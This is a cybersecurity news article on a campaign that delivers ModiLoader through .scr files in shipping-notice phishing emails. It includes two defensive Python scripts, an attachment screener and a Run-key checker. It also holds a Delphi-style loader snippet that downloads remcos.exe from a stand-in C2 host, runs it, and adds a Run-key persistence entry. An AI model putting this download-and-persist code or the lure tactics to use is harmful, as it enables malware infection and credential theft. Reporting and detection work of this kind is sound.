Threat Actors Weaponize Windows Screensavers Files to Deliver Malware

Malware operators continue exploiting the Windows Screensaver (.scr) file format to distribute malicious payloads, leveraging its executable nature under the guise of harmless system files.

Recent campaigns observed by cybersecurity researchers reveal advanced tactics targeting global enterprises through sophisticated phishing schemes.

One prominent example involves attackers impersonating a Taiwanese freight logistics company to deliver ModiLoader, a longstanding Delphi-based malware loader capable of deploying remote access trojans (RATs) and data stealers.


Broadcom analysts at Symantec documented an ongoing campaign between March and April 2025, where threat actors sent emails mimicking shipping notifications.

These messages, written in Chinese, referenced fictitious customs clearances and international shipments to lend credibility.

Attached RAR archives contained malicious .scr files masquerading as invoices or packing lists, initiating a chain of events leading to ModiLoader deployment.

The loader subsequently fetches secondary payloads such as Remcos, Agent Tesla, and Formbook, enabling attackers to exfiltrate credentials, monitor keystrokes, and establish persistent access.

The targeted sectors span industrial machinery manufacturing, automotive, electronics, and broadcasting across Japan, the United States, Taiwan, and Southeast Asia.

This geographic and industrial diversity underscores the attackers’ broad objectives, ranging from intellectual property theft to operational disruption.

Infection Mechanism and Technical Execution

The attack begins with a phishing email titled “//AMD ISF+AMD BL DRAFT//聯盛-裝船通知單-4/7 結關 KAO TO ATLANTA, GA VIA NYC CFS【友鋮】 SO.N023”.

The message instructs recipients to review an attached RAR archive labeled “景大 台北港ISF(032525)-invoice#JN-032525C-KAO TO ATLANTA, GA VIA NYC CFS【友鋮】 SO.N023.xIsx.rar”.

Inside lies a .scr file that executes ModiLoader upon extraction.
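The lure relies on two filename tricks: an executable .scr extension hidden behind a document-sounding name, and a look-alike extension (".xIsx" with a capital I standing in for ".xlsx") on the archive itself. The following attachment screener is an added example written for this article, not code from the campaign or from Symantec; the filenames, the confusable-character table and the sample attachment bytes are constructed here, and the only page-derived value is the archive name quoted above. It flags risky extensions independently of how the file is named, by checking for a PE header in the content.

```python
import struct

# Extensions that Windows will run as a native executable on double-click.
EXECUTABLE_EXTS = {".scr", ".exe", ".com", ".pif"}
# Extensions a freight invoice or packing list would plausibly carry.
DOCUMENT_EXTS = {".pdf", ".xlsx", ".xls", ".docx", ".doc", ".csv"}
# Characters commonly swapped for look-alikes in a faked extension (assumed table).
CONFUSABLES = str.maketrans({"I": "l", "1": "l", "0": "o"})

# Archive name quoted in the article; note ".xIsx" (capital I) before ".rar".
PAGE_ARCHIVE_NAME = "景大 台北港ISF(032525)-invoice#JN-032525C-KAO TO ATLANTA, GA VIA NYC CFS【友鋮】 SO.N023.xIsx.rar"


def split_exts(name):
    """Return every dotted suffix of a filename, e.g. 'a.pdf.scr' -> ['.pdf', '.scr']."""
    parts = name.split(".")
    return ["." + p for p in parts[1:]] if len(parts) > 1 else []


def filename_reasons(name):
    """Reasons a filename alone looks like a disguised executable."""
    reasons = []
    exts = split_exts(name)
    if not exts:
        return reasons
    final = exts[-1].lower()
    if final in EXECUTABLE_EXTS:
        reasons.append(f"executable extension {final}")
        # 'invoice.pdf.scr': a document extension stacked in front of the real one.
        for ext in exts[:-1]:
            if ext.lower() in DOCUMENT_EXTS:
                reasons.append(f"document extension {ext} before executable extension")
    # Any part that becomes a known document extension only after confusable
    # substitution is a look-alike, e.g. '.xIsx' -> '.xlsx'.
    for ext in exts:
        normalised = ext.translate(CONFUSABLES).lower()
        if normalised in DOCUMENT_EXTS and ext.lower() not in DOCUMENT_EXTS:
            reasons.append(f"look-alike extension {ext} resembles {normalised}")
    return reasons


def looks_like_pe(data):
    """True if the bytes start with a DOS header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def screen_attachment(name, data):
    """Combine filename heuristics with a content check; an empty list means clean."""
    reasons = filename_reasons(name)
    if looks_like_pe(data):
        reasons.append("content is a PE executable regardless of extension")
    return reasons


# Constructed sample contents: a minimal PE-shaped byte string, a PDF header, a RAR header.
FAKE_PE = bytearray(0x44)
FAKE_PE[:2] = b"MZ"
struct.pack_into("<I", FAKE_PE, 0x3C, 0x40)
FAKE_PE[0x40:0x44] = b"PE\x00\x00"
FAKE_PE = bytes(FAKE_PE)

SAMPLE_ATTACHMENTS = [
    ("invoice.pdf.scr", FAKE_PE),
    ("packing_list.pdf", b"%PDF-1.4\n%constructed sample\n"),
    (PAGE_ARCHIVE_NAME, b"Rar!\x1a\x07\x01\x00"),
]


def screen_all(attachments=SAMPLE_ATTACHMENTS):
    """Map each attachment name to its list of reasons for concern."""
    return {name: screen_attachment(name, data) for name, data in attachments}


if __name__ == "__main__":
    for name, reasons in screen_all().items():
        print(("FLAG " if reasons else "ok   ") + name, reasons)
```

The content check matters more than the name check: a mail gateway that only keys on ".scr" is defeated by renaming, while a PE header inside something claiming to be a spreadsheet is a reliable signal on its own. Archive members should be screened the same way after extraction in the sandbox.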

procedure TMainForm.Button1Click(Sender: TObject);
begin
  DownloadPayload('hxxp://malicious-c2[.]top/download/remcos.exe');
  ExecutePayload('%APPDATA%\remcos.exe');
  SetRegistryKey('HKCU\Software\Microsoft\Windows\CurrentVersion\Run', 'UpdateService', '%APPDATA%\remcos.exe');
end;
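The persistence step above writes a Run value whose image path sits under %APPDATA%, a user-writable directory that legitimate autostart entries rarely point into. The checker below is an added example for this article, not code from the loader or from Symantec; it parses the text format of `reg query` output, which is constructed here as sample input, and flags Run values whose executable lives in a user-writable location. The value name "UpdateService" and the %APPDATA% path come from the snippet above; the OneDrive entry is a constructed benign control.

```python
import re

# One value line of `reg query HKCU\...\Run` output: name, type, data separated by runs of spaces.
RUN_LINE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.+?)\s*$")

# Locations any standard user can write to; an autostart image here deserves a look.
USER_WRITABLE = re.compile(
    r"(%APPDATA%|%LOCALAPPDATA%|%TEMP%|%TMP%|\\AppData\\|\\Temp\\|\\Users\\Public\\|\\Downloads\\)",
    re.IGNORECASE,
)

# Constructed sample: what `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` prints.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background
    UpdateService    REG_SZ    %APPDATA%\remcos.exe
"""


def image_path(data):
    """The executable part of a Run value: the quoted path, or the text before the first space."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    return data.split(" ", 1)[0]


def parse_run_key(text):
    """Return (name, type, data) tuples for every value line in the query output."""
    entries = []
    for line in text.splitlines():
        m = RUN_LINE.match(line)
        if m:
            entries.append((m["name"], m["type"], m["data"]))
    return entries


def suspicious_run_entries(text):
    """Return (name, image_path) for Run values that start from a user-writable location."""
    findings = []
    for name, _type, data in parse_run_key(text):
        path = image_path(data)
        if USER_WRITABLE.search(path):
            findings.append((name, path))
    return findings


if __name__ == "__main__":
    for name, path in suspicious_run_entries(SAMPLE_REG_QUERY):
        print(f"suspicious autostart: {name} -> {path}")
```

On a live host the same logic applies to HKLM's Run key and to the per-user Startup folder; feeding it the output of a scheduled `reg query` gives a cheap baseline comparison that catches the loader's persistence even when the payload name changes.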

ModiLoader employs HTTP GET requests to communicate with command-and-control (C2) servers, downloading encrypted payloads that evade signature-based detection.

The malware injects these into legitimate processes like explorer.exe or svchost.exe using process hollowing, a technique that replaces executable memory sections with malicious code.

Symantec’s telemetry revealed modular updates to the loader, enabling dynamic payload switching based on victim profiles.

To counteract analysis, the .scr file performs anti-sandbox checks by querying system uptime and installed security software.

If thresholds are unmet, the malware enters a sleep loop or terminates. Once active, it drops a decoy document titled “Invoice_JN-032525C.pdf” to maintain the illusion of legitimacy while executing malicious operations in the background.

Symantec mitigates these threats through multi-layered defenses, including heuristic detection (Heur.AdvML.B) and static analysis rules (Trojan.Gen.MBT).

Enterprises are advised to block .scr file executions in high-risk environments and enforce email attachment sandboxing to intercept payloads before deployment.


Tushar Subhra Dutta
Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.